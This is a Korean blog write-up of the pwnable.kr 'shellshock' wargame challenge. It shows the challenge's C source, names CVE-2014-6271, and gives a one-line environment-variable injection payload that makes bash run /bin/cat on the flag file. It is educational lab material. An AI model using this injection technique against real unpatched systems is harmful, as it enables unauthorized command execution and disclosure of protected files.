shellshock

2022. 12. 29. 18:14·Wargame/pwnable.kr
728x90
반응형

1. intro

2. code 및 분석

2.1.  code

#include <stdio.h>
int main(){
        setresuid(getegid(), getegid(), getegid());
        setresgid(getegid(), getegid(), getegid());
        system("/home/shellshock/bash -c 'echo shock_me'");
        return 0;
}

2.2. 분석

흠... 초반이라 그런가... 문제가 영 재미가 없네 ;;;

파일 권한으로 set하고 shock_me 라는 메시지를 출력한다.

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

CVE-2014-6271

3.2. 공격 준비

뭐...없다

그냥 CVE 취약점이라....

요약하자면 실행하려하는 bash 명령어를 환경변수에 등록하여 이를 함께 실행되도록 하는 방법이다.

 

4. exploit

shellshock@pwnable:~$ env x='() { :; }; /bin/cat flag' ./shellshock
----------#플래그는 삭제
Segmentation fault (core dumped)
728x90
반응형
저작자표시 비영리 변경금지 (새창열림)

'Wargame > pwnable.kr' 카테고리의 다른 글

flag  (0) 2023.01.25
coin1  (0) 2022.12.30
mistake  (0) 2022.12.29
input  (0) 2022.12.28
random  (0) 2022.12.28
'Wargame/pwnable.kr' 카테고리의 다른 글
  • flag
  • coin1
  • mistake
  • input
wyv3rn
wyv3rn
아저씨의 흔한 취미. wyv3rn#1249
  • wyv3rn
    think storage
    wyv3rn
  • 전체
    오늘
    어제
    • 분류 전체보기 (505) N
      • To do list (7)
        • Doing (1)
        • Complete (6)
      • Diary (35)
      • Tips & theory (73)
      • Kernel Exploit (27)
        • Theory (15)
        • Exercise (5)
      • File Structure (6)
      • Wargame (313)
        • pwn.college (34)
        • Dreamhack (148)
        • pwnable.kr (15)
        • Lord of Sqlinjection (3)
        • Cryptohack (20)
        • Root me (27)
        • CodeEngn (4)
        • Exploit Education (22)
        • ROP Emporium (8)
        • H4C (10)
        • Hackerchool (22)
      • CTF (44) N
        • Solved (42) N
        • Unsolved (2)
      • Script (0)
      • RubiyaLap (0)
  • 블로그 메뉴

    • 홈
    • 방명록
  • 링크

  • 공지사항

    • PWN wargame 모음 (및 느낀점)
    • 비공개 글들에 대해.
    • 뭐라도 하나 얻어가시길...
  • 인기 글

  • 태그

    rop
    ROOT ME
    32bit
    CANARY
    Buffer Overflow
    64bit
    cryptohack
    dreamhack
    vtable
    root-me
    la ctf
    x86
    FSB
    tcache
    BOF
    pwntools
    RTL
    docker
    hackerschool
    Me
    _IO_FILE
    heap
    exploit education
    x64
    libc
    lob
    root
    phoenix
    Format String Bug
    pwnable.kr
  • 최근 댓글

  • 최근 글

  • 250x250
    반응형
  • hELLO· Designed By정상우.v4.10.3
wyv3rn
shellshock
상단으로

티스토리툴바